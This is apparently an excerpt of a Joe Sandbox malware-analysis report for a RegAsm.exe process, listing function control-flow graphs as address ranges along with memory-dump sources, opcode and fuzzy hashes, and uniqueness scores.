                                  control_flow_graph 300 c80710-c80776 306 c8077c-c8077f 300->306 307 c80974-c809d8 300->307 308 c80ab3-c80b2d 306->308 309 c80785-c8079a 306->309 338 c80c0b-c80c10 308->338 339 c80b33-c80b39 308->339 315 c8079c-c807b1 309->315 316 c807b7-c807d3 309->316 315->316 322 c80958-c80962 315->322 316->308 321 c807d9-c807e3 316->321 321->308 324 c807e9-c80802 321->324 326 c8096a-c8096e 322->326 330 c80804-c80824 324->330 331 c80826-c8083c 324->331 326->306 326->307 337 c8083f-c80861 330->337 331->337 343 c8086c-c80872 337->343 344 c80863-c80866 337->344 340 c80b3f-c80b76 339->340 341 c80c11-c80c44 call c80cc8 339->341 373 c80b78-c80b7e 340->373 374 c80bb1-c80bc2 340->374 361 c80cc0-c80cc4 341->361 362 c80c46-c80c49 341->362 345 c8087d-c80883 343->345 346 c80874-c80877 343->346 344->343 349 c809db-c80a0a 344->349 351 c80889-c8088c 345->351 352 c80923-c80956 345->352 346->345 350 c80a11-c80a40 346->350 349->350 366 c80a47-c80a76 350->366 351->352 353 c80892-c8089c 351->353 352->326 358 c8089e-c808a6 353->358 359 c80904-c80920 353->359 365 c808ac-c808b2 358->365 358->366 359->352 363 c80c4b-c80c6a 362->363 364 c80c6c-c80c84 362->364 395 c80c86-c80c9f 363->395 364->395 365->308 371 c808b8-c808cd 365->371 391 c80a7d-c80aac 366->391 371->391 392 c808d3-c808e8 371->392 373->341 376 c80b84-c80b8f 373->376 385 c80bf3-c80c05 374->385 386 c80bc4-c80bca 374->386 376->341 381 c80b95-c80baf 376->381 381->385 385->338 385->339 386->341 393 c80bcc-c80bd7 386->393 391->308 392->391 404 c808ee-c808f4 392->404 393->341 398 c80bd9-c80bf1 393->398 411 c80cbb-c80cbe 395->411 412 c80ca1-c80ca8 395->412 398->385 404->308 408 c808fa-c80902 404->408 408->352 411->361 411->362 412->411 413 c80caa-c80cb3 412->413 413->411
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83620f19c00e376328ce17beaa47ed64918267152cbe62631a14d1b549fa4398
                                  • Instruction ID: 0285b4c4add076a1497b6e076b8262ef0354a8becf812bd3146e28f8cf47df7f
                                  • Opcode Fuzzy Hash: 83620f19c00e376328ce17beaa47ed64918267152cbe62631a14d1b549fa4398
                                  • Instruction Fuzzy Hash: 85028C30B002058FCB55EF68C894A6EB7F2FF88304F258569D45A9B395DB31ED06CBA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C800B9, Relevance: .1, Instructions: 82COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 417 c800b9-c8010f 426 c801b2-c801b6 417->426 427 c80115 417->427 445 c80115 call 8da23c 427->445 446 c80115 call 8da25e 427->446 428 c8011a 429 c80121-c80148 428->429 429->426 434 c8014a-c8017d 429->434 434->426 441 c8017f-c801ab 434->441 441->426 445->428 446->428
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f80fdabb4181396de6820d03e8d413b5a137c37f911173fec7be21215c6fb3d6
                                  • Instruction ID: 5f9c220f802032d657044c014e71186ba03e5a905b4f7d31beafda469b1e9f84
                                  • Opcode Fuzzy Hash: f80fdabb4181396de6820d03e8d413b5a137c37f911173fec7be21215c6fb3d6
                                  • Instruction Fuzzy Hash: 1B211B347012108FCB59AB7CD068A6D3BF2AFD6315B2445B9D016CF7A1DE368D45CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80006, Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 c80006-c8006e 448 c80070-c8007e 447->448 455 c80081 call c800b9 448->455 456 c80081 call 8d23f4 448->456 449 c80087-c80091 457 c80093 call 24105e4 449->457 458 c80093 call 2410606 449->458 459 c80093 call c801b7 449->459 450 c80099-c8009b 451 c8009d-c800a3 450->451 452 c800a4-c800b3 450->452 455->449 456->449 457->450 458->450 459->450
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b745235df4f60f5ce0f33e0b9101a64a429b88569e334ac98e356cdb0614de0f
                                  • Instruction ID: 195a3f82ca238d7f648d6d7e60133cfed9c959d492a035fae3ec96096b524d27
                                  • Opcode Fuzzy Hash: b745235df4f60f5ce0f33e0b9101a64a429b88569e334ac98e356cdb0614de0f
                                  • Instruction Fuzzy Hash: D9112A6950E7C09FE7038B709C60585BFB4AE47211B1A84D7D1C4CF2B3E7694E09C762
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80DA0, Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 460 c80da0-c80da9 461 c80db1-c80db3 460->461 472 c80dab call c80d90 460->472 473 c80dab call c80da0 460->473 462 c80dbb-c80e2e 461->462 463 c80db5-c80dba 461->463 471 c80e33-c80e35 462->471 472->461 473->461
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5db390a2f0ed7241383f9480fc0878d51a9760d42d5e385ebd7c5d3dfc7afe42
                                  • Instruction ID: 13126c5e661edc8be58ae492799908bff23cc708e929411269869b17292aead2
                                  • Opcode Fuzzy Hash: 5db390a2f0ed7241383f9480fc0878d51a9760d42d5e385ebd7c5d3dfc7afe42
                                  • Instruction Fuzzy Hash: 1001D631B042849FC306ABB8D86459D7FB5EF86210F2444EAD449DB3A1CE749E06C766
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 024105E4, Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 474 24105e4-2410620 476 2410626-2410643 474->476
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199984482.0000000002410000.00000040.00000040.sdmp, Offset: 02410000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_2410000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 335590b877179abb3989c5ce450191493c582633bebc3daeaf19efaa18920086
                                  • Instruction ID: 00388ced17d09b0de436e06df69fbf1c5f223fa5e7f5a1889df5a08302dfa8fe
                                  • Opcode Fuzzy Hash: 335590b877179abb3989c5ce450191493c582633bebc3daeaf19efaa18920086
                                  • Instruction Fuzzy Hash: 92F0F4B25093846FD7118F16EC40862FFA8EA86630748C09FEC498B612D225B908CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80D19, Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 477 c80d19-c80d52 485 c80d54 call c80d90 477->485 486 c80d54 call c80da0 477->486 481 c80d5a-c80d89 485->481 486->481
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71c48e25a056c9d93c3c0f4d70424f1cf3905b9d87bfa4f60ceacd0bb367d830
                                  • Instruction ID: 9d2745fc3c211db241f1d61a21576d45ca4514653cf434bb774eee8abac27c0a
                                  • Opcode Fuzzy Hash: 71c48e25a056c9d93c3c0f4d70424f1cf3905b9d87bfa4f60ceacd0bb367d830
                                  • Instruction Fuzzy Hash: 89F0CD717082605FD70D637DA8645BB6BA6EFCA214B14417AE009CB3A2CCB64C0283A0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80070, Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 487 c80070-c8007e 494 c80081 call c800b9 487->494 495 c80081 call 8d23f4 487->495 488 c80087-c80091 496 c80093 call 24105e4 488->496 497 c80093 call 2410606 488->497 498 c80093 call c801b7 488->498 489 c80099-c8009b 490 c8009d-c800a3 489->490 491 c800a4-c800b3 489->491 494->488 495->488 496->489 497->489 498->489
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e61152f8dca27da4e02ea12a822dfbfe4fe151054af029ab63c2ed131d448a8
                                  • Instruction ID: 7fa487f9f8a1b0a13427f0851ce9740a904bee78a75acc9fdd6bd19f212c6f04
                                  • Opcode Fuzzy Hash: 2e61152f8dca27da4e02ea12a822dfbfe4fe151054af029ab63c2ed131d448a8
                                  • Instruction Fuzzy Hash: 43E06D36604649EF8B04EFA5E8884DEBBA9FA84221B108066E509C7110EB315A408B84
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 02410606, Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 499 2410606-2410620 500 2410626-2410643 499->500
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199984482.0000000002410000.00000040.00000040.sdmp, Offset: 02410000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_2410000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68a03a9f0ea9dadb6e2822fe1b9e01dcf3d50f41dbf9427f94c756260e6003f3
                                  • Instruction ID: 601c37808707a615b27ec1adbc5c5d155153c434355b0a750099350113c955e7
                                  • Opcode Fuzzy Hash: 68a03a9f0ea9dadb6e2822fe1b9e01dcf3d50f41dbf9427f94c756260e6003f3
                                  • Instruction Fuzzy Hash: 47E092B66006048BD650DF0AEC81452FBD4EB84630B48C47FDD0E9BB00D136B504CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80CC8, Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 501 c80cc8-c80ce5 502 c80d15-c80d17 501->502 503 c80ce7-c80d02 call c80d19 501->503 503->502 505 c80d04-c80d0d 503->505 505->502
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc226c3708c4d4724ceefb3c52b617caa73507f252b9c83b9ccf106d44aaf0ac
                                  • Instruction ID: a0a21768dd6f10fec28adef09e1e047a8a3119ad210f64f51f661758dc744cc6
                                  • Opcode Fuzzy Hash: dc226c3708c4d4724ceefb3c52b617caa73507f252b9c83b9ccf106d44aaf0ac
                                  • Instruction Fuzzy Hash: 0CF0EC316091C08FD351EB78E458B917FE55F86224F1540DBD445CB117C7245D48CB41
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C80D90, Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a34cab1c1c4660a707e91a6b413b9d1a1762683b960f38f859912678bd53e8f8
                                  • Instruction ID: 2f54e1b59e5c66fcd9036940f684ae1eb08b82247cb90d0312562e773daa53cf
                                  • Opcode Fuzzy Hash: a34cab1c1c4660a707e91a6b413b9d1a1762683b960f38f859912678bd53e8f8
                                  • Instruction Fuzzy Hash: B0D05E316081A08FC7125BB868680F97FB49E0B21175801D2D888CB1A1D6104F2A83A1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 008D23F4, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198657951.00000000008D2000.00000040.00000001.sdmp, Offset: 008D2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8d2000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6302ebcb74ebaf2f245cd0fb011fe57d95a5c75be85f0d81e073116a710b8080
                                  • Instruction ID: 5e03961e0f819f20927bed8d6a94d91dd81c333960ab61858df5f4507801e282
                                  • Opcode Fuzzy Hash: 6302ebcb74ebaf2f245cd0fb011fe57d95a5c75be85f0d81e073116a710b8080
                                  • Instruction Fuzzy Hash: B7D05E792056818FE317DE1CC1A5F953BD4BBA1B04F4645FAAC00CB7A3C368D981D204
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 008D23BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198657951.00000000008D2000.00000040.00000001.sdmp, Offset: 008D2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8d2000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86a0e360dc1e6174727958d67389e3cb501e1549d2af498fcf40ffaccf09f5a9
                                  • Instruction ID: d16f892a44fb5cf4a018d1517acfe0c7f55d8918533880dd70bb0282dc7c06d6
                                  • Opcode Fuzzy Hash: 86a0e360dc1e6174727958d67389e3cb501e1549d2af498fcf40ffaccf09f5a9
                                  • Instruction Fuzzy Hash: 5BD05E342001814BDB19DE0CC2D4F5937D4BB90B04F0645E9BC00CB372C3B8DD81C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions